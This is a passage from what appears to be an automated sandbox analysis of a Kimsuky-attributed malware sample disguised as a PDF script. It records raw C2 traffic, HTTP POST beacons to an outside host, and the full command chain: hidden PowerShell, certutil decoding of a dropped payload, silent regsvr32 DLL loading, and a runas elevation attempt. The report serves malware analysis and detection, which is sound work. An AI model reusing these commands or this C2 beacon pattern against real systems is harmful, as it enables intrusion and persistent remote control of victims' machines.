                Aug 25, 2021 10:59:35.661602974 CEST33OUTData Raw: 58 3d a7 51 03 45 33 1f 9a 6b 06 04 0a 16 73 6f 4b 87 ab 76 a2 36 49 bb 72 e6 63 f8 c6 0a 6d 71 1f d1 a7 69 be b2 56 87 bc bc 7d 0c 68 17 f3 bc 08 51 a0 34 75 1e 1c 3c e1 0b bd c8 66 1f 0e ef 76 a6 aa e9 a3 36 fc e8 53 de 75 60 18 b5 f0 55 bc 36
                Data Ascii: X=QE3ksoKv6IrcmqiV}hQ4u<fv6Su`U6S.vIFYTSk"5$g#"|uP+n)_q)P,]jw/r>cO]{NY\6C<1S$%XrwgA7:>8@Fu*
                Aug 25, 2021 10:59:36.681978941 CEST38OUTData Raw: c1 d6 e3 ac 0b 7d 00 96 42 28 4c b4 46 6b f3 80 22 82 02 4b 7b 2d 39 7c 01 05 5a 93 22 35 25 0d b8 61 48 f3 a0 fa f5 0b 80 bf 3c 24 6f ed d7 0f f3 01 e0 da 36 bc ce d4 d9 5b 04 a0 eb 9e 1a 42 27 1c 5d 9e dd e3 87 ce 6a 53 2a 07 ac 2a ec 1f a7 c9
                Data Ascii: }B(LFk"K{-9|Z"5%aH<$o6[B']jS**rba` ~o$YEyL`*3}*)JKD*9SoH;09"U"j[0,fm-HU<v#6aT^-(S0os}Z'OtW
                Aug 25, 2021 10:59:36.682291031 CEST54OUTData Raw: 0c df 7e fc b7 bd b0 04 a3 b2 f1 a2 e0 42 c9 32 a2 ba 58 59 e8 a2 53 19 e9 6d e6 15 5d 93 61 78 24 c5 a8 ec 19 7f 87 5d c5 7e 16 32 80 38 2d f6 f0 f6 40 f5 3a 27 79 95 cf a7 72 65 3d 4a cc 63 82 9f 95 4e d8 33 72 2a ed e4 50 74 ff eb 69 d4 42 d2
                Data Ascii: ~B2XYSm]ax$]~28-@:'yre=JcN3r*PtiBpl7|R!+;)tv=[ium>bG4x(lS2oWNA*m#Y_?i,DEI(Ij1s"E?|83sCdcOit-n>Pexg6}*
                Aug 25, 2021 10:59:37.702500105 CEST59OUTData Raw: 3e 8d 8d 91 fa f2 2d aa c3 c7 79 04 4b 02 37 63 45 36 cc 9f 43 72 5d 75 49 38 e2 1b 5e fe 1f ce a4 c1 9f b5 79 97 a8 54 df 0f ba 58 2c c2 75 77 d5 09 cb 03 b1 cc be 2a b1 a4 fa 4f 8a 62 73 09 0b 00 6a 44 fa c9 c5 83 b9 99 53 29 ea a7 1a 8b ea c3
                Data Ascii: >-yK7cE6Cr]uI8^yTX,uw*ObsjDS)1\(^ qCK;qoF~jSynS=7?97@#kD;-)K:R}6<`/}PNl-d06'/WGj;g+0:.IL8JU&f
                Aug 25, 2021 10:59:37.702645063 CEST66OUTData Raw: a5 43 f0 88 00 65 05 85 8a b7 53 50 94 61 63 98 51 e9 bc ec e9 c8 89 44 00 50 b0 5f ad 3b d3 b1 6d 4c 77 0b 35 8a 8c 66 15 20 af 3b 30 d0 30 5b 81 f2 f3 3d 80 09 14 cd b1 e6 e4 21 f0 67 b9 82 d8 88 a8 cb cb 3d 81 fc 75 97 fa 16 f1 80 25 5d 6d fd
                Data Ascii: CeSPacQDP_;mLw5f ;00[=!g=u%]m4|]A$=V$m[Z|)#?,b,-L=9q2>sbe\$#`_Yic.3,_9?ICH:F<&CFwc&npG


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.1.1034970650.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:34.642957926 CEST18OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                6192.168.1.1034970850.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:47.898830891 CEST70OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                7192.168.1.1034970950.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:47.899632931 CEST70OUTPOST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                8192.168.1.1034971050.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:53.001545906 CEST71OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Session IDSource IPSource PortDestination IPDestination PortProcess
                9192.168.1.1034971150.17.5.22480C:\Windows\System32\regsvr32.exe
                TimestampkBytes transferredDirectionData
                Aug 25, 2021 10:59:53.001627922 CEST72OUTPOST //?m=c&p1=8ace1190 HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                Host: texts.letterpaper.press
                Content-Length: 0
                Cache-Control: no-cache


                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:10:58:08
                Start date:25/08/2021
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse'
                Imagebase:0x7ff7d2c70000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.544459351.0000027E99732000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534562796.0000027E99708000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534889418.0000027E99708000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.546366739.0000027E9B3E9000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.562500921.0000027E9993A000.00000004.00000040.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.535487473.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.545823503.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559995374.0000027E99740000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.399402263.0000027E9B3C3000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.562513728.0000027E9993D000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.547005043.0000027E9B3CF000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.427755304.0000027E9B3E1000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.547727779.0000027E9B3E1000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534727641.0000027E99677000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559503063.0000027E996A5000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.551541440.0000027E9CD90000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559948938.0000027EB69DF000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.559831762.0000027E996A5000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.539482612.0000027E99715000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.569744930.0000027E9B3E2000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.534340935.0000027E9CCC6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.571001527.0000027E9CCB6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.546419483.0000027E9B3C6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.549235895.0000027E99939000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000003.540876716.0000027E9972A000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.570828518.0000027E9CC69000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000000.00000002.571040593.0000027E9CCC6000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.547572927.0000027E9993C000.00000004.00000001.sdmp, Author: Florian Roth
                Reputation:high

                General

                Start time:10:58:24
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf'
                Imagebase:0x1c0000
                File size:2459120 bytes
                MD5 hash:84E2B28A5B7221B3AAB82CD7CA4D6619
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:26
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf'
                Imagebase:0x1c0000
                File size:2459120 bytes
                MD5 hash:84E2B28A5B7221B3AAB82CD7CA4D6619
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:24
                Start date:25/08/2021
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
                Imagebase:0x7ff7c39f0000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.454006767.0000022E214AA000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.453909044.0000022E2144F000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.445327272.0000022E1F060000.00000004.00000020.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.453777516.0000022E213DE000.00000004.00000001.sdmp, Author: Florian Roth
                • Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000004.00000002.452214006.0000022E20FF2000.00000004.00000001.sdmp, Author: Florian Roth
                Reputation:high

                General

                Start time:10:58:25
                Start date:25/08/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7a3f70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:29
                Start date:25/08/2021
                Path:C:\Windows\System32\certutil.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
                Imagebase:0x7ff6a6b40000
                File size:1557504 bytes
                MD5 hash:EB199893441CED4BBBCB547FE411CF2D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:10:58:38
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043
                Imagebase:0xde0000
                File size:9805296 bytes
                MD5 hash:C4531F5D235167293675FF6CE5472440
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:47
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2
                Imagebase:0xde0000
                File size:9805296 bytes
                MD5 hash:C4531F5D235167293675FF6CE5472440
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:47
                Start date:25/08/2021
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
                Imagebase:0x7ff7c39f0000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Start time:10:58:55
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1
                Imagebase:0xde0000
                File size:9805296 bytes
                MD5 hash:C4531F5D235167293675FF6CE5472440
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:47
                Start date:25/08/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7a3f70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:50
                Start date:25/08/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a
                Imagebase:0x7ff71df80000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Kimsuky, Description: Yara detected Kimsuky, Source: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Author: Joe Security
                Reputation:high

                General

                Start time:10:58:51
                Start date:25/08/2021
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat
                Imagebase:0x7ff6c71a0000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:52
                Start date:25/08/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7a3f70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:53
                Start date:25/08/2021
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat
                Imagebase:0x7ff6c71a0000
                File size:273920 bytes
                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:58:53
                Start date:25/08/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
                Imagebase:0x7ff71df80000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Kimsuky, Description: Yara detected Kimsuky, Source: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Author: Joe Security
                Reputation:high

                General

                Start time:10:58:54
                Start date:25/08/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7a3f70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:59:07
                Start date:25/08/2021
                Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                Wow64 process (32bit):true
                Commandline:'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1
                Imagebase:0xde0000
                File size:9805296 bytes
                MD5 hash:C4531F5D235167293675FF6CE5472440
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:10:59:01
                Start date:25/08/2021
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
                Imagebase:0x7ff7c39f0000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Start time:10:59:02
                Start date:25/08/2021
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7a3f70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language

                General

                Start time:10:59:04
                Start date:25/08/2021
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
                Imagebase:0x7ff71df80000
                File size:24064 bytes
                MD5 hash:D78B75FC68247E8A63ACBA846182740E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Kimsuky, Description: Yara detected Kimsuky, Source: 00000018.00000002.558431847.00007FF983D01000.00000040.00020000.sdmp, Author: Joe Security

                General

                Start time:10:59:14
                Start date:25/08/2021
